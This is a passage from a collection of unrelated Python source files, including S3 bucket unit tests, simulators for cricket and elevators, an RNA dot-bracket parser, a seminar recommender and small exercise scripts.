self.assertTrue(result['deleted'])
def test_that_when_deleting_cors_fails_the_delete_cors_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_cors.side_effect = ClientError(error_content,
'delete_bucket_cors')
result = boto_s3_bucket.delete_cors(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_cors'))
def test_that_when_deleting_lifecycle_configuration_succeeds_the_delete_lifecycle_configuration_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_lifecycle_configuration(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_lifecycle_configuration_fails_the_delete_lifecycle_configuration_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_lifecycle.side_effect = ClientError(error_content,
'delete_bucket_lifecycle_configuration')
result = boto_s3_bucket.delete_lifecycle_configuration(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_lifecycle_configuration'))
def test_that_when_deleting_policy_succeeds_the_delete_policy_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_policy(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_policy_fails_the_delete_policy_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_policy.side_effect = ClientError(error_content,
'delete_bucket_policy')
result = boto_s3_bucket.delete_policy(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_policy'))
def test_that_when_deleting_replication_succeeds_the_delete_replication_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_replication(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_replication_fails_the_delete_replication_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_replication.side_effect = ClientError(error_content,
'delete_bucket_replication')
result = boto_s3_bucket.delete_replication(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_replication'))
def test_that_when_deleting_tagging_succeeds_the_delete_tagging_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_tagging(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_tagging_fails_the_delete_tagging_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_tagging.side_effect = ClientError(error_content,
'delete_bucket_tagging')
result = boto_s3_bucket.delete_tagging(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_tagging'))
def test_that_when_deleting_website_succeeds_the_delete_website_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_website(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_website_fails_the_delete_website_method_returns_error(self):
'''
tests False bucket attribute not deleted.
'''
self.conn.delete_bucket_website.side_effect = ClientError(error_content,
'delete_bucket_website')
result = boto_s3_bucket.delete_website(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('delete_bucket_website'))
|
#!/usr/bin/env python3
import os
from app.models import Player
from app.resources import GamePlay
import argparse
def get_team():
"""
Initializes the squad: the list of players in the order they are
expected to bat.
Uses the Player model to create each batsman with their given
scoring probabilities.
"""
batsmen_list = [
Player('Kirat Boli', {
'0': 5,
'1': 30,
'2': 25,
'3': 10,
'4': 15,
'5': 1,
'6': 9,
'OUT': 5,
}),
Player('N.S. Nodhi', {
'0': 10,
'1': 40,
'2': 20,
'3': 5,
'4': 10,
'5': 1,
'6': 4,
'OUT': 10,
}),
Player('R Rumrah', {
'0': 20,
'1': 30,
'2': 15,
'3': 5,
'4': 5,
'5': 1,
'6': 4,
'OUT': 20,
}),
Player('Shashi Henra', {
'0': 30,
'1': 25,
'2': 5,
'3': 0,
'4': 5,
'5': 1,
'6': 4,
'OUT': 30,
})
]
return batsmen_list
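# Note: each batsman's outcome weights above sum to 100, so GamePlay can presumably treat
# them as percentage probabilities when sampling ball-by-ball results.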
def main():
"""
Lets the game begin!
"""
parser = argparse.ArgumentParser()
parser.add_argument('-rg', '--random-generator',
dest='random_gen_class',
help='Provide one of the stochastic schemes for '
'generating random scores, takes one of the 2 '
'values - \'random sampling\' or '
'\'roulette selection\'',
type=str)
# parse the given arguments if any
args = parser.parse_args()
batting_lineup = get_team()
# new Game instance
game = GamePlay(batting_lineup, random_gen_class=args.random_gen_class)
game.execute_run_chase()
if __name__ == '__main__':
main()
|
import sys
from typing import List
input = sys.stdin.readline
# def solution(N: int, nums: List[int]):
# __cache__ = [[0, 0] for _ in range(N)]
# __cache__[0] = [nums[0], nums[0]]
# for i in range(1, N):
# __prev__ = 0
# for j in range(i - 1, -1, -1):
# if nums[j] < nums[i]:
# __prev__ = max(__prev__, __cache__[j][0])
# __cache__[i][0] = __prev__ + nums[i]
# __cache__[i][1] = max(__cache__[i - 1][1], __cache__[i][0])
# return __cache__[N - 1][1]
def solution(N: int, nums: List[int]):
__cache__ = [0] * 1001
for num in nums:
__cache__[num] = max(__cache__[:num]) + num
return max(__cache__)
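# The value-indexed DP above stores, for each value num, the best sum of an increasing
# subsequence ending in num: __cache__[num] = max(__cache__[:num]) + num.
# Illustrative trace: nums = [1, 100, 2, 50] gives cache[1] = 1, cache[100] = 101,
# cache[2] = 3, cache[50] = 53, so max(__cache__) = 101.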
N = int(input())
nums = list(map(int, input().split()))
__cache__ = [0] * 1001
for num in nums:
__cache__[num] = max(__cache__[:num]) + num
print(max(__cache__))
|
from redis_admin.compat import url as redis_admin_url, get_library
Library = get_library()
register = Library()
@register.tag
def url(parser, token):
return redis_admin_url(parser, token)
|
'''Glyph'''
from importlib import reload
import zDogPy.shape
reload(zDogPy.shape)
from zDogPy.shape import Shape
def makePath(glyph, closed=True):
path = []
for ci, c in enumerate(glyph.contours):
if closed:
pt0 = c[-1][-1]
cmd = { 'move' : {'x': pt0.x, 'y': pt0.y } }
path.append(cmd)
for si, s in enumerate(c.segments):
if len(s) == 1:
pt = s[0]
if si == 0 and not closed:
cmd = { 'move' : { 'x': pt.x, 'y': pt.y } }
else:
cmd = { 'x': pt.x, 'y': pt.y }
elif len(s) == 3:
cmd = { 'bezier' : [{ 'x': pt.x, 'y': pt.y } for pt in s] }
path.append(cmd)
return path
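# Sketch of the zDogPy path commands makePath emits (coordinates purely illustrative):
# [{'move': {'x': 10, 'y': 0}},      # contour start (last on-curve point when closed)
#  {'x': 120, 'y': 0},               # straight segment to an on-curve point
#  {'bezier': [{'x': 120, 'y': 80}, {'x': 60, 'y': 110}, {'x': 10, 'y': 80}]}]  # cubic segment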
class Glyph(Shape):
def __init__(self, glyph, centered=True, **kwargs):
self.glyph = glyph
if centered:
L, B, R, T = self.glyph.bounds
x = L + (R - L) / 2
y = B + (T - B) / 2
kwargs['translate'] = { 'x' : -x, 'y': -y }
Shape.__init__(self, **kwargs)
self.updatePath()
def setPath(self):
self.path = makePath(self.glyph, closed=self.closed)
def render(self, ctx, renderer):
Shape.render(self, ctx, renderer)
|
somaidade = 0
maioridadehomem = 0
totmulher20 = 0
nomevelho = ''
for dados in range(1, 5):
print('----- PERSON {} -----'.format(dados))
nome = str(input('Name: ')).strip()
idade = int(input('Age: '))
sexo = str(input('Sex [M/F]: ')).strip()
somaidade += idade
if dados == 1 and sexo in 'Mm':
maioridadehomem += idade
nomevelho = nome
if sexo in 'Mm' and idade > maioridadehomem:
maioridadehomem = idade
nomevelho = nome
if sexo in 'Ff' and idade < 20:
totmulher20 += 1
mediaidade = somaidade / 4
print('The average age of the group is {} years'.format(mediaidade))
print('The oldest man in the group is named {} and is {} years old'.format(nomevelho, maioridadehomem))
print('In total there are {} women under 20 years old'.format(totmulher20))
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import random
from collections import deque
from rlschool.liftsim.environment.mansion.elevator import Elevator
from rlschool.liftsim.environment.mansion.utils import PersonType
from rlschool.liftsim.environment.mansion.utils import MansionAttribute, MansionState, ElevatorState
from rlschool.liftsim.environment.mansion.utils import EPSILON, ENTERING_TIME
from rlschool.liftsim.environment.mansion.mansion_config import MansionConfig
from rlschool.liftsim.environment.mansion.person_generators.generator_proxy import PersonGenerator
from rlschool.liftsim.environment.mansion.person_generators.person_generator import PersonGeneratorBase
class MansionManager(object):
"""
Mansion Class
Mansion Randomly Generates Person that requiring elevators for a lift
"""
def __init__(
self,
elevator_number,
person_generator,
mansion_config,
name="Mansion"):
"""
Initializing the Building
Args:
floor_number: number of floor in the building
elevator_number: number of elevator in the building
floor_height: height of single floor
time_step: Simulation timestep
person_generator: PersonGenerator class that generates stochastic pattern of person flow
Returns:
None
"""
assert isinstance(mansion_config, MansionConfig)
assert isinstance(person_generator, PersonGeneratorBase)
self._name = name
self._config = mansion_config
self._floor_number = self._config.number_of_floors
self._floor_height = self._config.floor_height
self._dt = self._config.delta_t
self._elevator_number = elevator_number
self._person_generator = person_generator
# people waiting for more than 300 seconds will give up
self._given_up_time_limit = 300
#used for statistics
self._statistic_interval = int(600 / self._dt)
self._delivered_person = deque()
self._generated_person = deque()
self._abandoned_person = deque()
self._cumulative_waiting_time = deque()
self._cumulative_energy_consumption = deque()
self.reset_env()
def reset_env(self):
self._elevators = []
for i in range(self._elevator_number):
self._elevators.append(
Elevator(start_position=0.0,
mansion_config=self._config,
name="%s_E%d" % (self._name, i + 1)))
self._config.reset()
self._person_generator.link_mansion(self._config)
# whether the go up/down button is clicked
self._button = [[False, False] for i in range(self._floor_number)]
self._wait_upward_persons_queue = [
deque() for i in range(
self._floor_number)]
self._wait_downward_persons_queue = [
deque() for i in range(
self._floor_number)]
@property
def state(self):
"""
Return Current state of the building simulator
"""
upward_req = []
downward_req = []
state_queue = []
for idx in range(self._floor_number):
if(self._button[idx][0]):
upward_req.append(idx + 1)
if(self._button[idx][1]):
downward_req.append(idx + 1)
for i in range(self._elevator_number):
state_queue.append(self._elevators[i].state)
return MansionState(state_queue, upward_req, downward_req)
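# The returned MansionState bundles one ElevatorState per elevator plus the (1-indexed)
# floors whose upward / downward call buttons are currently pressed.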
def run_mansion(self, actions):
"""
Perform one step of simulations
Args:
actions: A list of actions, e.g., action.add_target = [2, 6, 8], action.remove_target = [4]
mark the target floor to be added into the queue or removed from the queue
Returns:
State, Cumulative Waiting Time for Persons, Energy Consumption of Elevators
"""
self._config.step() # update the current time
person_list = self._person_generator.generate_person()
tmp_generated_person = len(person_list)
for person in person_list:
if(person.SourceFloor < person.TargetFloor):
self._wait_upward_persons_queue[person.SourceFloor -
1].appendleft(person)
elif(person.SourceFloor > person.TargetFloor):
self._wait_downward_persons_queue[person.SourceFloor - 1].appendleft(
person)
energy_consumption = [0.0 for i in range(self._elevator_number)]
# carry out actions on each elevator
for idx in range(self._elevator_number):
self._elevators[idx].set_action(actions[idx])
# make each elevator run one step
loaded_person_num = 0
tmp_delivered_person = 0
for idx in range(self._elevator_number):
energy_consumption[idx], delivered_person_time, tmp_loaded_person = self._elevators[idx].run_elevator()
tmp_delivered_person += len(delivered_person_time)
loaded_person_num += tmp_loaded_person
for floor in range(self._floor_number):
if(len(self._wait_upward_persons_queue[floor]) > 0):
self._button[floor][0] = True
else:
self._button[floor][0] = False
if(len(self._wait_downward_persons_queue[floor]) > 0):
self._button[floor][1] = True
else:
self._button[floor][1] = False
ele_idxes = [i for i in range(self._elevator_number)]
random.shuffle(ele_idxes)
for ele_idx in ele_idxes:
floor, delta_distance = self._elevators[ele_idx].nearest_floor
is_open = self._elevators[ele_idx].is_fully_open and (
abs(delta_distance) < 0.05)
is_ready = self._elevators[ele_idx].ready_to_enter
            # Elevator stops at a certain floor and its direction is consistent
            # with the waiting customers' target direction
floor_idx = floor - 1
if(is_open):
if(self._elevators[ele_idx]._direction == 1):
self._button[floor_idx][0] = False
elif(self._elevators[ele_idx]._direction == -1):
self._button[floor_idx][1] = False
if(is_ready and is_open):
self._config.log_debug(
"Floor: %d, Elevator: %s is open, %d persons are waiting to go upward, %d downward", floor, self._elevators[ele_idx].name, len(
self._wait_upward_persons_queue[floor_idx]), len(
self._wait_downward_persons_queue[floor_idx]))
if(self._elevators[ele_idx]._direction == -1):
for i in range(
len(self._wait_downward_persons_queue[floor_idx]) - 1, -1, -1):
entering_person = self._wait_downward_persons_queue[floor_idx][i]
req_succ = self._elevators[ele_idx].person_request_in(
entering_person)
if(req_succ):
del self._wait_downward_persons_queue[floor_idx][i]
self._config.log_debug(
"Person %s is walking into the %s elevator",
entering_person,
self._elevators[ele_idx].name)
                        else:  # if entry failed because the elevator is overloaded, try the next person
if not self._elevators[ele_idx]._is_overloaded_alarm:
break
elif(self._elevators[ele_idx]._direction == 1):
                    # let passengers waiting to go upward enter
for i in range(
len(self._wait_upward_persons_queue[floor_idx]) - 1, -1, -1):
entering_person = self._wait_upward_persons_queue[floor_idx][i]
req_succ = self._elevators[ele_idx].person_request_in(
entering_person)
if(req_succ):
del self._wait_upward_persons_queue[floor_idx][i]
self._config.log_debug(
"Person %s is walking into the %s elevator",
entering_person,
self._elevators[ele_idx].name)
else:
if not self._elevators[ele_idx]._is_overloaded_alarm:
break
# Remove those who waited too long
give_up_persons = 0
for floor_idx in range(self._floor_number):
for pop_idx in range(
len(self._wait_upward_persons_queue[floor_idx]) - 1, -1, -1):
if(self._config.raw_time - self._wait_upward_persons_queue[floor_idx][pop_idx].AppearTime > self._given_up_time_limit):
self._wait_upward_persons_queue[floor_idx].pop()
give_up_persons += 1
else:
break
for pop_idx in range(
len(self._wait_downward_persons_queue[floor_idx]) - 1, -1, -1):
if(self._config.raw_time - self._wait_downward_persons_queue[floor_idx][pop_idx].AppearTime > self._given_up_time_limit):
self._wait_downward_persons_queue[floor_idx].pop()
give_up_persons += 1
else:
break
cumulative_waiting_time = 0
for i in range(self._floor_number):
cumulative_waiting_time += self._dt * \
len(self._wait_upward_persons_queue[i])
cumulative_waiting_time += self._dt * \
len(self._wait_downward_persons_queue[i])
cumulative_waiting_time += loaded_person_num * self._dt
cumulative_energy_consumption = float(sum(energy_consumption))
self._delivered_person.appendleft(tmp_delivered_person)
self._generated_person.appendleft(tmp_generated_person)
self._abandoned_person.appendleft(give_up_persons)
self._cumulative_waiting_time.appendleft(cumulative_waiting_time)
self._cumulative_energy_consumption.appendleft(cumulative_energy_consumption)
if(len(self._delivered_person) > self._statistic_interval):
self._delivered_person.pop()
self._generated_person.pop()
self._abandoned_person.pop()
self._cumulative_waiting_time.pop()
self._cumulative_energy_consumption.pop()
return cumulative_waiting_time, cumulative_energy_consumption, give_up_persons
def get_statistics(self):
"""
Get Mansion Statistics
"""
return {
"DeliveredPersons(10Minutes)": int(sum(self._delivered_person)),
"GeneratedPersons(10Minutes)": int(sum(self._generated_person)),
"AbandonedPersons(10Minutes)": int(sum(self._abandoned_person)),
"EnergyConsumption(10Minutes)": float(sum(self._cumulative_energy_consumption)),
"TotalWaitingTime(10Minutes)": float(sum(self._cumulative_waiting_time))}
@property
def attribute(self):
"""
returns all kinds of attributes
"""
return MansionAttribute(
self._elevator_number,
self._floor_number,
self._floor_height)
@property
def config(self):
"""
Returns config of the mansion
"""
return self._config
@property
def waiting_queue(self):
"""
Returns the waiting queue of each floor
"""
return [self._wait_upward_persons_queue, self._wait_downward_persons_queue]
@property
def loaded_people(self):
"""
Returns: the number of loaded people of each elevator
"""
return [self._elevators[i].loaded_people_num for i in range(self._elevator_number)]
@property
def name(self):
"""
Returns name of the mansion
"""
return self._name
|
#
# Copyright © 2022 Christos Pavlatos, George Rassias, Christos Andrikos,
# Evangelos Makris, Aggelos Kolaitis
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the “Software”), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from typing import Tuple, Dict
from enum import Enum
class State(Enum):
NONE = 0
LEFT_CORE = 1
RIGHT_CORE = 2
class Stem(Enum):
RIGHT = "right"
LEFT = "left"
class Dot2Pair:
"""
Parse dot bracket expressions and extract positions of stems
"""
SYMBOL_MAP = {"(": ")", "[": "]", ")": "(", "]": "["}
OPPOSITE_SYMBOL_MAP = {")": "]", "(": "[", "[": "(", "]": ")"}
def __init__(self, dot_bracket: str):
"""A new parser set to parse the related dot bracket.
:return: a DotParser instance
"""
self.dot_bracket = dot_bracket
# these flags are going to be set
        # whenever we match a pseudoknot during the lookup ...
self.state = State.NONE
self.stack = {Stem.RIGHT: [], Stem.LEFT: []}
try:
first_symbol = next(x for x in self.dot_bracket if x in self.SYMBOL_MAP)
except StopIteration:
raise ValueError(f"{self.dot_bracket} has no stem symbols")
self.left_open_symbol = first_symbol
self.right_open_symbol = self.OPPOSITE_SYMBOL_MAP[first_symbol]
self.left_close_symbol = self.SYMBOL_MAP[self.left_open_symbol]
self.right_close_symbol = self.SYMBOL_MAP[self.right_open_symbol]
# result stack
self._result = {
"right_core_stems": [],
"left_core_stems": [],
"right_stems": [],
"left_stems": [],
}
def parse_dot(self):
for position, char in enumerate(self.dot_bracket):
self.__char_digest(position, char)
if any(self.stack.values()):
raise ValueError(f"imbalanced stems {self.stack}")
def __char_digest(self, position: int, char: str):
"""
:return: side-effects
"""
if char == self.left_open_symbol:
self.stack[Stem.LEFT].append(position)
elif char == self.left_close_symbol:
binding = self.stack[Stem.LEFT].pop()
is_core = self.state == State.LEFT_CORE
if is_core:
self.state = State.RIGHT_CORE
self.__add_pair(Stem.LEFT, (binding, position), is_core)
elif char == self.right_open_symbol:
self.stack[Stem.RIGHT].append(position)
if self.state == State.NONE:
self.state = State.LEFT_CORE
elif char == self.right_close_symbol:
binding = self.stack[Stem.RIGHT].pop()
is_core = self.state == State.RIGHT_CORE
if is_core:
self.state = State.NONE
self.__add_pair(Stem.RIGHT, (binding, position), is_core)
def __add_pair(self, key: Stem, pair: Tuple[int, int], is_core: bool):
key = f"{key.value}{'_core' if is_core else ''}_stems"
self._result[key].append(pair)
@property
def result(self):
return self._result
def find_matches(dot_bracket: str) -> Dict[int, int]:
"""
parse dot bracket. return dictionary of matching stems. If no stems exist,
an empty dictionary is returned.
"""
try:
dot2pair = Dot2Pair(dot_bracket)
dot2pair.parse_dot()
except ValueError:
return {}
matches = {}
for stems in dot2pair.result.values():
for start, end in stems:
matches[start] = end
matches[end] = start
return matches
def get_confusion_matrix(truth: str, prediction: str, slack: int = 0):
truth_matches = find_matches(truth)
prediction_matches = find_matches(prediction)
assert len(truth) == len(prediction)
tp, tn, fp, fn = 0, 0, 0, 0
for idx in range(0, len(truth)):
tmatch = truth_matches.get(idx, None)
pmatch = prediction_matches.get(idx, None)
if tmatch is None:
if pmatch is None:
tn += 1
else:
# TODO: check disabled test, at index 0
fp += 1
else:
if pmatch is None:
fn += 1
# TODO: check disabled test, at index 1
else:
if abs(pmatch - tmatch) <= slack:
tp += 1
else:
fp += 1
return tp, tn, fp, fn
def get_core_stem_indices(dot_bracket: str):
"""
    Returns core stem indices for the dot bracket. If the dot bracket has no
    pseudoknot, an IndexError is raised; if it has no stem symbols or the
    stems are imbalanced, a ValueError is raised.
"""
dot2pair = Dot2Pair(dot_bracket)
dot2pair.parse_dot()
result = dot2pair.result
right_core = result["right_core_stems"][0]
left_core = result["left_core_stems"][0]
return left_core[0], right_core[0], left_core[1], right_core[1]
def get_correct_core_stems(truth: str, pred: str, slack: int = 0) -> int:
"""
    Returns the number of correct core stems (0, 1 or 2) for the prediction.
    If either dot bracket has no pseudoknot, 0 is returned; a malformed dot
    bracket raises a ValueError.
"""
try:
tstems = get_core_stem_indices(truth)
pstems = get_core_stem_indices(pred)
except IndexError:
return 0
left_ok = abs(tstems[0] - pstems[0]) + abs(tstems[2] - pstems[2]) <= slack
right_ok = abs(tstems[1] - pstems[1]) + abs(tstems[3] - pstems[3]) <= slack
return left_ok + right_ok
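# Illustrative self-check of the parser and the metrics above, run on a
# made-up pseudoknotted dot bracket (example values only).
if __name__ == "__main__":
    example = "..((..[[..))..]].."
    matches = find_matches(example)
    print(matches)  # every paired position maps to its partner, e.g. 3 -> 10 and 10 -> 3
    print(get_confusion_matrix(example, example))  # (8, 10, 0, 0): 8 paired, 10 unpaired positions
    print(get_correct_core_stems(example, example))  # 2: both core stems line up exactly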
|
from rest_api import db
from datetime import datetime
# attachment for tracking logs / user posts, many to one
class AttachmentModel(db.Model):
__tablename__ = "attachments"
id = db.Column(db.Integer, primary_key=True)
attachment_name = db.Column(db.String(200), nullable=False, unique=True)
# need inverse relation so order retrieves all its tracking logs
track_log_id = db.Column(db.Integer, db.ForeignKey("tracking_logs.id"))
date = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
    is_deleted = db.Column(db.Integer, default=0)
def __init__(self, attachment_name, track_log_id):
self.attachment_name = attachment_name
self.track_log_id = track_log_id
def json(self):
return {
"id":self.id,
"attachment_name":self.attachment_name,
"track_log_id": self.track_log_id
}
@classmethod
def find_by_id(cls, id):
return cls.query.filter_by(id=id, is_deleted=0).first()
@classmethod
def find_by_track_log_id(cls, track_log_id):
return cls.query.filter_by(track_log_id=track_log_id)
def save_to_db(self):
db.session.add(self)
db.session.commit()
def delete_from_db(self):
self.is_deleted=1
db.session.add(self)
db.session.commit()
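# Illustrative usage sketch (assumes an application context and an existing
# tracking log with id 1; the file name is a placeholder):
# attachment = AttachmentModel("delivery_photo.jpg", track_log_id=1)
# attachment.save_to_db()
# print(attachment.json())
# attachment.delete_from_db()  # soft delete: only flips is_deleted to 1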
|
price = int(input("Give me the price of this place! "))
rent = int(input("and what's the rent per week? "))
bodyC = int(input("and the body corporate per quarter? "))
RatesLand = int(input("What do the land rates look like per quarter? "))
RatesWater = int(input("Finally, I'll need the water rates per quarter? "))
def conv(price):
    # weekly interest cost at a notional 7% p.a. on the purchase price
    return price * 0.07 / 52
def rconv(rent):
    # gross rental yield: annual rent as a percentage of the purchase price
    return rent * 52 / price * 100
def pconv(bodyC):
    # yield after deducting annual body corporate fees
    return ((rent * 52) - (bodyC * 4)) / price * 100
def lconv(RatesLand):
    # yield after body corporate fees and land rates
    return ((rent * 52) - (bodyC * 4) - (RatesLand * 4)) / price * 100
def wconv(RatesWater):
    # net yield after body corporate fees, land rates and water rates
    return ((rent * 52) - (bodyC * 4) - (RatesLand * 4) - (RatesWater * 4)) / price * 100
Yearly_Water = wconv(RatesWater)
Yearly_Land = lconv(RatesLand)
yearly_yield_BC = pconv(bodyC)
yearly_rent = rconv(rent)
yearly_yield = conv(price)
print(f"\nThis is your rental yield excluding Body Corporate {yearly_rent}% ")
print(f"This is your rental yield including Body Corporate {yearly_yield_BC}% ")
print(f"Body Corporate and land rates is {Yearly_Land}% yield. ")
print(f"\nSo you're final yield will be at {Yearly_Water}% compared to {yearly_rent}% ")
|
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'seminar-roulette.settings')
import django
django.setup()
from backend.models import *
import csv
import random
import math
import pandas as pd
import numpy as np
from django.db.models import Q
from django.utils import timezone
from scipy.sparse.linalg import svds
class Recommender:
"""
Recommender system code adapted from online tutorial.
Partial credit goes to Nick Becker.
https://beckernick.github.io/matrix-factorization-recommender/
"""
def __init__(self, user):
ratings_list = []
# For each user in database
for university_user in UniversityUser.objects.all().order_by('guid'):
# For each seminar in database
for seminar in Seminar.objects.all().order_by('title'):
try:
                    # Check if user has a seminar history model created for that seminar
seminar_history = SeminarHistory.objects.get(
user=university_user, seminar=seminar
)
# Check if user has rated that seminar
if seminar_history.discarded:
rating = math.nan
else:
rating = int(seminar_history.rating)
except SeminarHistory.DoesNotExist:
rating = math.nan
# Append user, seminar and rating to a list
ratings_list.append((university_user.guid, seminar.id, rating))
# Create data frame for ratings list
ratings_df = pd.DataFrame(
ratings_list, columns=['guid', 'seminar', 'rating']
)
# Fill seminars which user hasn't rated with 0's
combined_df = ratings_df.pivot(
index='guid', columns='seminar', values='rating'
).fillna(0)
guids, seminars, ratings_mean, ratings_demeaned = self.get_data(
combined_df
)
self.recommendations = self.recommend(
guids, seminars, ratings_mean, ratings_demeaned, user.guid
)
def get_data(self, ratings):
guids = ratings.index.tolist()
seminars = ratings.columns.tolist()
ratings = ratings.values
ratings_mean = np.mean(ratings, axis=1)
# Normalise by each user's mean
ratings_demeaned = ratings - ratings_mean.reshape(-1, 1)
return guids, seminars, ratings_mean, ratings_demeaned
def recommend(self, guids, seminars, ratings_mean, ratings_demeaned, guid):
# Calculate singular value decomposition
U, sigma, Vt = svds(ratings_demeaned, k=5)
# Convert to diagonal matrix form
sigma = np.diag(sigma)
# Make predictions
predicted_ratings = np.dot(np.dot(U, sigma),
Vt) + ratings_mean.reshape(-1, 1)
predictions_df = pd.DataFrame(
predicted_ratings, index=guids, columns=seminars
)
# Manipulate data frame and sort by GUID
df_sorted = predictions_df.loc[[
guid
]].transpose().sort_values(by=guid, ascending=False)
return df_sorted.index.values
def recommendation_engine(user):
recommendation_seminars = []
recommendations = Recommender(user).recommendations
# Loop through the user's recommendations
for recommendation in recommendations:
# Get upcoming seminar if it is recurring
upcoming_seminar = Seminar.objects.filter(
id=recommendation
).order_by('start_time').first()
recommendation_seminars.append(upcoming_seminar)
# Get seminars which user has attended OR discarded
seminar_history = user.seminarhistory_set.filter(
Q(attended=True) | Q(discarded=True)
)
seminars_attended_discarded = Seminar.objects.filter(id__in=seminar_history)
seminars = []
count, seminar_count = 0, 0
# Get 5 seminar recommendations
while count < 5 and seminar_count < len(recommendation_seminars):
seminar = recommendation_seminars[seminar_count]
# Check user hasn't previously attended the seminar and that it is in the future
if seminar not in seminars_attended_discarded and seminar is not None and seminar.is_future:
seminars.append(recommendation_seminars[seminar_count])
count += 1
seminar_count += 1
return seminars
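# Illustrative usage sketch (assumes populated UniversityUser, Seminar and
# SeminarHistory tables; the guid below is a placeholder):
# user = UniversityUser.objects.get(guid='1234567a')
# upcoming = recommendation_engine(user)  # up to 5 future seminars the user has not attended or discarded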
|
# LeetCode 888. Fair Candy Swap `E`
# 1sk | 92% | 7'
# A~0v06
from typing import List
class Solution:
def fairCandySwap(self, A: List[int], B: List[int]) -> List[int]:
setB = set(B)
        # Alice gives `a` and receives `a + dif`, where dif is half the difference in totals
        dif = (sum(B) - sum(A)) // 2
for a in A:
if a + dif in setB:
return [a, a+dif]
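if __name__ == "__main__":
    # Illustrative check: Alice has [1, 1] (total 2), Bob has [2, 2] (total 4);
    # swapping a 1 for a 2 leaves both with a total of 3.
    print(Solution().fairCandySwap([1, 1], [2, 2]))  # [1, 2]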
|
# -*- coding: utf-8 -*-
"""
Tests for tipfy.appengine.db
"""
import unittest
import hashlib
from google.appengine.ext import db
from google.appengine.api import datastore_errors
from werkzeug.exceptions import NotFound
from tipfy.appengine import db as ext_db
import test_utils
class FooModel(db.Model):
name = db.StringProperty(required=True)
name2 = db.StringProperty()
age = db.IntegerProperty()
married = db.BooleanProperty()
data = ext_db.PickleProperty()
slug = ext_db.SlugProperty(name)
slug2 = ext_db.SlugProperty(name2, default='some-default-value', max_length=20)
etag = ext_db.EtagProperty(name)
etag2 = ext_db.EtagProperty(name2)
somekey = ext_db.KeyProperty()
class FooExpandoModel(db.Expando):
pass
class BarModel(db.Model):
foo = db.ReferenceProperty(FooModel)
class JsonModel(db.Model):
data = ext_db.JsonProperty()
class TimezoneModel(db.Model):
data = ext_db.TimezoneProperty()
@ext_db.retry_on_timeout(retries=3, interval=0.1)
def test_timeout_1(**kwargs):
counter = kwargs.get('counter')
# Let it pass only in the last attempt
if counter[0] < 3:
counter[0] += 1
raise db.Timeout()
@ext_db.retry_on_timeout(retries=5, interval=0.1)
def test_timeout_2(**kwargs):
counter = kwargs.get('counter')
# Let it pass only in the last attempt
if counter[0] < 5:
counter[0] += 1
raise db.Timeout()
raise ValueError()
@ext_db.retry_on_timeout(retries=2, interval=0.1)
def test_timeout_3(**kwargs):
# Never let it pass.
counter = kwargs.get('counter')
counter[0] += 1
raise db.Timeout()
class TestModel(test_utils.BaseTestCase):
def test_no_protobuf_from_entity(self):
res_1 = ext_db.get_entity_from_protobuf([])
self.assertEqual(res_1, None)
res_2 = ext_db.get_protobuf_from_entity(None)
self.assertEqual(res_2, None)
def test_no_entity_from_protobuf(self):
res_1 = ext_db.get_entity_from_protobuf([])
self.assertEqual(res_1, None)
def test_one_model_to_and_from_protobuf(self):
